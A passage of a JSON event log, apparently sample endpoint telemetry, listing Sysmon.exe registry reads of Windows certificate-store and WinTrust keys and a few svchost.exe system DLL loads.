"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "OnDemandConnRouteHelper.dll", - "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "webio.dll", - "image_path": "C:\\Windows\\System32\\webio.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 